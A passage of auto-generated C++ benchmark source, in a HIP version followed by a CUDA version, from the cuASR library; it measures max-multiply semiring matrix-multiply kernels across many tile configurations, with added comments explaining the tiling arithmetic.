->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 4 x 2 // Threadblock: 128 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) 
and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_32x16x1_4x4_8x4_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<128, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_32x16x1_4x4_8x4_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 4 // Threadblock: 32 x 64 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x16_8x16x1_2x2_4x8_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x16_8x16x1_2x2_4x8_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif 
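////////////////////////////////////////////////////////////////////////////////
// Sketch (not part of the generated sources): the header comments above encode
// a fixed tiling scheme, and each benchmark name spells it out as
// <Threadblock>_<WarpTile>_<Elements/Thread>_<Threads/Warp>_<Warps/Block>.
// The shapes are related by simple products: warp tile = elements/thread *
// threads/warp, and threadblock tile = warp tile * warps/block. The constants
// below are copied from the 64x64x8_32x32x1_8x4_4x8_2x2 variant earlier in
// this file; the constant names themselves are illustrative only.
namespace tiling_sketch {
constexpr int kElemsPerThreadM = 8, kElemsPerThreadN = 4;  // "8x4"
constexpr int kThreadsPerWarpM = 4, kThreadsPerWarpN = 8;  // "4x8"
constexpr int kWarpsPerBlockM  = 2, kWarpsPerBlockN  = 2;  // "2x2"

// Warp tile = elements/thread * threads/warp  ->  32 x 32
constexpr int kWarpM = kElemsPerThreadM * kThreadsPerWarpM;
constexpr int kWarpN = kElemsPerThreadN * kThreadsPerWarpN;

// Threadblock tile = warp tile * warps/block  ->  64 x 64
constexpr int kBlockM = kWarpM * kWarpsPerBlockM;
constexpr int kBlockN = kWarpN * kWarpsPerBlockN;

static_assert(kWarpM == 32 && kWarpN == 32, "matches WarpShape<32, 32, 8>");
static_assert(kBlockM == 64 && kBlockN == 64, "matches ThreadblockShape<64, 64, 8>");
}  // namespace tiling_sketch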
//////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 4 // Threadblock: 32 x 128 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x16_8x32x1_2x4_4x8_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 128, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x16_8x32x1_2x4_4x8_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 8 x 4 // Warps / Block: 4 x 4 // Threadblock: 64 x 32 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x16_16x8x1_2x2_8x4_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 16>; using WarpShape = cutlass::gemm::GemmShape<16, 8, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, 
benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x16_16x8x1_2x2_8x4_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 4 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x16x1_4x2_4x8_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x16x1_4x2_4x8_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 8 x 4 // Warps / Block: 4 x 4 // Threadblock: 128 x 32 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x16_32x8x1_4x2_8x4_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<128, 32, 16>; using WarpShape = cutlass::gemm::GemmShape<32, 8, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { 
    benchmark::DoNotOptimize(bench.run());
    hipDeviceSynchronize();
  }

  double flops_per_itr = 2.0 * N * N * N;
  state.counters["Flop/s"] =
      benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate);
}
BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x16_32x8x1_4x2_8x4_4x4)
    ->RangeMultiplier(2)->Range(256, 4096);
#endif
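////////////////////////////////////////////////////////////////////////////////
// Sketch (not part of either generated file): the .cu listing that follows is
// the CUDA counterpart of the HIP benchmarks above, and the only runtime call
// that appears to differ inside the benchmark loop is hipDeviceSynchronize()
// versus cudaDeviceSynchronize(). A thin single-source wrapper such as the one
// below is one way to express that difference; __HIPCC__ is defined by the
// hipcc compiler driver, and the wrapper name is illustrative only.
#if defined(__HIPCC__)
#include <hip/hip_runtime.h>
inline void device_synchronize() { (void)hipDeviceSynchronize(); }
#else
#include <cuda_runtime.h>
inline void device_synchronize() { (void)cudaDeviceSynchronize(); }
#endif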
023df7b5c9b09af407347ce1efeb7ba7230c58e3.cu
/***************************************************************************************************
 * Copyright (c) 2020, Vijay Thakkar ([email protected]).
 **************************************************************************************************/
//////////////////////////////////////////////////////////////////////
// THIS BENCHMARK FILE IS GENERATED AUTOMATICALLY : DO NOT MODIFY //
//////////////////////////////////////////////////////////////////////

#include "benchmark/benchmark.h"

#include "cuasr/gemm/device/default_srgemm_configuration.h"
#include "cuasr/gemm/device/srgemm.h"
#include "cuasr/functional.h"

#include "harness.h"

////////////////////////////////////////////////////////////////////////////////
// Elements / Thread: 2 x 4
// Threads / Warp: 4 x 8
// Warps / Block: 1 x 1
// Threadblock: 8 x 32 x 8
#if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1)
static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x32x1_2x4_4x8_1x1(benchmark::State &state) {
  const auto N = static_cast<int>(state.range(0));
  using precision = double;
  using OpClass = cutlass::arch::OpClassSimt;
  using SmArch = cutlass::arch::Sm50;

  using ThreadblockShape = cutlass::gemm::GemmShape<8, 32, 8>;
  using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>;
  using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>;

  using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< //
      precision, precision, precision, precision, OpClass, //
      cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>;

  using AddOp = Config::AdditionOp;
  using MultOp = Config::MultiplicationOp;
  using EpilogueOutputOp = Config::EpilogueOutputOp;

  using Srgemm = cuasr::gemm::device::Srgemm< //
      AddOp, MultOp, //
      precision, cutlass::layout::ColumnMajor, //
      precision, cutlass::layout::ColumnMajor, //
      precision, cutlass::layout::ColumnMajor, //
      precision, OpClass, SmArch, //
      ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, //
      cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>;

  // setup bench harness
  cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N });

  // benchmark loop
  for (auto _ : state) {
    benchmark::DoNotOptimize(bench.run());
    cudaDeviceSynchronize();
  }

  double flops_per_itr = 2.0 * N * N * N;
  state.counters["Flop/s"] =
      benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate);
}
BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x32x1_2x4_4x8_1x1)
    ->RangeMultiplier(2)->Range(256, 4096);
#endif

////////////////////////////////////////////////////////////////////////////////
// Elements / Thread: 4 x 4
// Threads / Warp: 4 x 8
// Warps / Block: 1 x 1
// Threadblock: 16 x 32 x 8
#if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1)
static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x32x1_4x4_4x8_1x1(benchmark::State &state) {
  const auto N = static_cast<int>(state.range(0));
  using precision = double;
  using OpClass = cutlass::arch::OpClassSimt;
  using SmArch = cutlass::arch::Sm50;

  using ThreadblockShape = cutlass::gemm::GemmShape<16, 32, 8>;
  using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>;
  using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>;

  using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< //
      precision, precision, precision, precision, OpClass, //
      cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>;

  using AddOp = Config::AdditionOp;
  using MultOp = Config::MultiplicationOp;
  using EpilogueOutputOp = Config::EpilogueOutputOp;

  using Srgemm =
cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x32x1_4x4_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 8 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 16 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x64x1_4x8_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 64, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x64x1_4x8_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 0) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x32x1_8x4_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, 
cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x32x1_8x4_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 8 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x16x1_2x2_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<8, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x16x1_2x2_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 8 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x64x8_8x32x1_2x4_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<8, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config 
= typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x64x8_8x32x1_2x4_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 16 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x16x1_4x2_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x16x1_4x2_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 16 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x32x1_4x4_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = 
cutlass::gemm::GemmShape<16, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x32x1_4x4_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 8 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 16 x 128 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x8_16x64x1_4x8_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 128, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 64, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using 